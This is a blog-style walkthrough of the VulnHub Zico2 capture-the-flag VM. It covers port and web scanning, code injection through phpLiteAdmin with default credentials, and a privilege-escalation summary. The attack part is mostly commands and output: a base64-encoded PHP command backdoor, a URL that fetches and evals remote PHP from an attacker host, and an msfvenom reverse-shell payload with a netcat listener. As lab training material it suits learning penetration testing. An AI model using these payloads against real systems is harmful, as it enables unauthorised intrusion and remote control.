After loading the vm into vmware, scanned with nmap. Port 80 as usual appeared to be the most interesting. So i fired up nikto and then dirsearch in that order.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@kali:/tmp# nmap -sT -A -PO -n -v 192.168.83.133 | |
| Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-09 09:39 EDT | |
| NSE: Loaded 146 scripts for scanning. | |
| NSE: Script Pre-scanning. | |
| Initiating NSE at 09:40 | |
| Completed NSE at 09:40, 0.00s elapsed | |
| Initiating NSE at 09:40 | |
| Completed NSE at 09:40, 0.00s elapsed | |
| Initiating ARP Ping Scan at 09:40 | |
| Scanning 192.168.83.133 [1 port] | |
| Completed ARP Ping Scan at 09:40, 0.22s elapsed (1 total hosts) | |
| Initiating Connect Scan at 09:40 | |
| Scanning 192.168.83.133 [1000 ports] | |
| Discovered open port 22/tcp on 192.168.83.133 | |
| Discovered open port 80/tcp on 192.168.83.133 | |
| Discovered open port 111/tcp on 192.168.83.133 | |
| Completed Connect Scan at 09:40, 0.03s elapsed (1000 total ports) | |
| Initiating Service scan at 09:40 | |
| Scanning 3 services on 192.168.83.133 | |
| Completed Service scan at 09:40, 6.15s elapsed (3 services on 1 host) | |
| Initiating OS detection (try #1) against 192.168.83.133 | |
| adjust_timeouts2: packet supposedly had rtt of -175891 microseconds. Ignoring time. | |
| adjust_timeouts2: packet supposedly had rtt of -175891 microseconds. Ignoring time. | |
| NSE: Script scanning 192.168.83.133. | |
| Initiating NSE at 09:40 | |
| Completed NSE at 09:40, 0.29s elapsed | |
| Initiating NSE at 09:40 | |
| Completed NSE at 09:40, 0.01s elapsed | |
| Nmap scan report for 192.168.83.133 | |
| Host is up (0.00053s latency). | |
| Not shown: 997 closed ports | |
| PORT STATE SERVICE VERSION | |
| 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | |
| | ssh-hostkey: | |
| | 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA) | |
| | 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA) | |
| |_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA) | |
| 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) | |
| | http-methods: | |
| |_ Supported Methods: OPTIONS GET HEAD POST | |
| |_http-server-header: Apache/2.2.22 (Ubuntu) | |
| |_http-title: Zico's Shop | |
| 111/tcp open rpcbind 2-4 (RPC #100000) | |
| | rpcinfo: | |
| | program version port/proto service | |
| | 100000 2,3,4 111/tcp rpcbind | |
| | 100000 2,3,4 111/udp rpcbind | |
| | 100024 1 35817/udp status | |
| |_ 100024 1 49910/tcp status | |
| MAC Address: 00:0C:29:A2:5A:63 (VMware) | |
| Device type: general purpose | |
| Running: Linux 2.6.X|3.X | |
| OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 | |
| OS details: Linux 2.6.32 - 3.5 | |
| Uptime guess: 198.046 days (since Sat Mar 25 08:33:47 2017) | |
| Network Distance: 1 hop | |
| TCP Sequence Prediction: Difficulty=265 (Good luck!) | |
| IP ID Sequence Generation: All zeros | |
| Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel | |
| TRACEROUTE | |
| HOP RTT ADDRESS | |
| 1 0.53 ms 192.168.83.133 | |
| NSE: Script Post-scanning. | |
| Initiating NSE at 09:40 | |
| Completed NSE at 09:40, 0.00s elapsed | |
| Initiating NSE at 09:40 | |
| Completed NSE at 09:40, 0.00s elapsed | |
| Read data files from: /usr/bin/../share/nmap | |
| OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
| Nmap done: 1 IP address (1 host up) scanned in 17.23 seconds | |
| Raw packets sent: 36 (2.850KB) | Rcvd: 32 (2.322KB) | |
| root@kali:~/dirsearch# nikto -h http://192.168.83.133 | |
| - Nikto v2.1.6 | |
| --------------------------------------------------------------------------- | |
| + Target IP: 192.168.83.133 | |
| + Target Hostname: 192.168.83.133 | |
| + Target Port: 80 | |
| + Start Time: 2017-10-09 09:40:28 (GMT-4) | |
| --------------------------------------------------------------------------- | |
| + Server: Apache/2.2.22 (Ubuntu) | |
| + Server leaks inodes via ETags, header found with file /, inode: 3803593, size: 7970, mtime: Thu Jun 8 15:18:30 2017 | |
| + The anti-clickjacking X-Frame-Options header is not present. | |
| + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS | |
| + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type | |
| + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. | |
| + Uncommon header 'tcn' found, with contents: list | |
| + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html | |
| + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST | |
| + OSVDB-3268: /img/: Directory indexing found. | |
| + OSVDB-3092: /img/: This might be interesting... | |
| + OSVDB-3233: /icons/README: Apache default file found. | |
| + Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26 | |
| + 8346 requests: 0 error(s) and 12 item(s) reported on remote host | |
| + End Time: 2017-10-09 09:40:49 (GMT-4) (21 seconds) | |
| --------------------------------------------------------------------------- | |
| + 1 host(s) tested |
root@kali:~/dirsearch# ./dirsearch.py -u http://192.168.83.133/ -e php _|. _ _ _ _ _ _|_ v0.3.7 (_||| _) (/_(_|| (_| ) Extensions: php | Threads: 10 | Wordlist size: 5992 Error Log: /root/dirsearch/logs/errors-17-10-09_09-50-00.log Target: http://192.168.83.133/ [09:50:00] Starting: [09:50:02] 403 - 286B - /.hta [09:50:02] 403 - 293B - /.ht_wsr.txt [09:50:02] 403 - 297B - /.htaccess-local [09:50:02] 403 - 295B - /.htaccess-dev [09:50:02] 403 - 295B - /.htaccess.BAK [09:50:02] 403 - 297B - /.htaccess-marco [09:50:02] 403 - 295B - /.htaccess.old [09:50:02] 403 - 296B - /.htaccess.bak1 [09:50:02] 403 - 298B - /.htaccess.sample [09:50:02] 403 - 296B - /.htaccess.orig [09:50:02] 403 - 296B - /.htaccess.save [09:50:02] 403 - 295B - /.htaccess.txt [09:50:02] 403 - 297B - /.htaccess_extra [09:50:02] 403 - 296B - /.htaccess_orig [09:50:02] 403 - 294B - /.htaccessBAK [09:50:02] 403 - 295B - /.htaccessOLD2 [09:50:02] 403 - 294B - /.htaccessOLD [09:50:03] 403 - 294B - /.htaccess_sc [09:50:03] 403 - 292B - /.htaccess~ [09:50:03] 403 - 290B - /.htgroup [09:50:03] 403 - 295B - /.htpasswd-old [09:50:03] 403 - 296B - /.htpasswd_test [09:50:03] 403 - 290B - /.htusers [09:50:03] 403 - 292B - /.htpasswds [09:50:18] 403 - 290B - /cgi-bin/ [09:50:21] 301 - 314B - /css -> http://192.168.83.133/css/ [09:50:21] 301 - 318B - /dbadmin -> http://192.168.83.133/dbadmin/ [09:50:21] 200 - 917B - /dbadmin/ [09:50:22] 403 - 286B - /doc/ [09:50:22] 403 - 301B - /doc/en/changes.html [09:50:22] 403 - 300B - /doc/stable.version [09:50:24] 200 - 3KB - /gulpfile.js [09:50:25] 301 - 314B - /img -> http://192.168.83.133/img/ [09:50:25] 200 - 8KB - /index [09:50:26] 200 - 8KB - /index.html [09:50:27] 301 - 313B - /js -> http://192.168.83.133/js/ [09:50:27] 200 - 1KB - /LICENSE [09:50:34] 200 - 789B - /package.json [09:50:34] 200 - 789B - /package [09:50:38] 200 - 1KB - /README.md [09:50:40] 403 - 295B - /server-status [09:50:40] 403 - 296B - /server-status/ [09:50:44] 200 - 8KB - /tools [09:50:45] 200 - 0B - /view.php Task CompletedThe dbadmin folder obviously looked the most interesting. So i quicky browsed it. This inturn led me to htpp://192.168.83.133/dbadmin/test_db.php At the prompt i logged in with default credentilas of admin. I then searched for existing vulnerabilities in phpliteadmin.
At this point i tried to follow along what the advisory said but was a little handcapped since the screenshots were nolonger up.
The screenshots below show how i managed to execute code on the zico2 box
Click "Go"
fill in as shown in the screenshot (under the Default Value field put <?php phpinfo()?> as in the advisory) then click "Create"
You should be greeted with a message that shows that the table was successfully created as in the screenshot below
after that click on "/usr/databases/test.php" the click the "Rename Database" tab
I chose that folder (dbadmin) since thats the location of the default test_db.php file
At this point browsing to the http://192.168.83.133/dbadmin/west.php we should have the phpinfo file displayed to us as in the screenshot below
Now we know we have code execution. Next step is to upload something more evil like a command shell. When i directly uploaded a command shell, it didnt work so i base64 encoded it.
The steps for uploading are the same as above with a small difference of base64 encoding the it.
root@kali:/tmp# cp /usr/share/webshells/php/simple-backdoor.php .
Modify and remove the php tags so it looks like below.
root@kali:/tmp# cat simple-backdoor.php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
Now base64 encode it
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@kali:/tmp# msfvenom -p generic/custom -e php/base64 -f raw PAYLOADFILE=simple-backdoor.php | |
| No platform was selected, choosing Msf::Module::Platform from the payload | |
| No Arch selected, selecting Arch: x86 from the payload | |
| Found 1 compatible encoders | |
| Attempting to encode payload with 1 iterations of php/base64 | |
| php/base64 succeeded with size 226 (iteration=0) | |
| php/base64 chosen with final size 226 | |
| Payload size: 226 bytes | |
| eval(base64_decode(aWYoaXNzZXQoJF9SRVFVRVNUWydjbWQnXSkpewogICAgICAgIGVjaG8gIjxwcmU.chr(43).IjsKICAgICAgICAkY21kID0gKCRfUkVRVUVTVFsnY21kJ10pOwogICAgICAgIHN5c3RlbSgkY21kKTsKICAgICAgICBlY2hvICI8L3ByZT4iOwogICAgICAgIGRpZTsKfQoK)); |
Paste the resulting code into the default value field.
<php? <base64 encoded code goes here without the angle brackets :-)> ?>
As before rename the database to whatever you like, I named mine bd.php. We should now have a functional shell.
However this shell is a little limited so we'll use metasploit to get a better shell.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://192.168.83.133/dbadmin/bd.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval%28file_get_contents%28%27http://192.168.83.175:8081/RwdifigI%27%29%29;%22 | |
| #I didnt like this shell as well since it kept dying on me. | |
| root@kali:/tmp# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.83.175 LPORT=9999 EXITFUNC=thread -a x64 -f elf -o shell9999.elf | |
| No platform was selected, choosing Msf::Module::Platform::Linux from the payload | |
| No encoder or badchars specified, outputting raw payload | |
| Payload size: 74 bytes | |
| Final size of elf file: 194 bytes | |
| Saved as: shell9999.elf | |
| root@kali:/tmp# file shell9999.elf | |
| shell9999.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, corrupted section header size | |
| root@kali:/tmp# cp shell9999.elf /var/www/html/ | |
| root@kali:/tmp# nc -lvp 9999 | |
| listening on [any] 9999 ... |
I downloaded the linux exploit sugester onto the system and the first exploit did the trick. gcc wasnt working well on the victim box so i compiled the exploit on another box then returned it to the victim box which gave me a root shell.
Finally browsed to the root folder and read the flat.txt file. At this point i was obliged to do the rewt dance :-)
Thanks to Rafael and the team over at vulnhub for the challenges.
No comments:
Post a Comment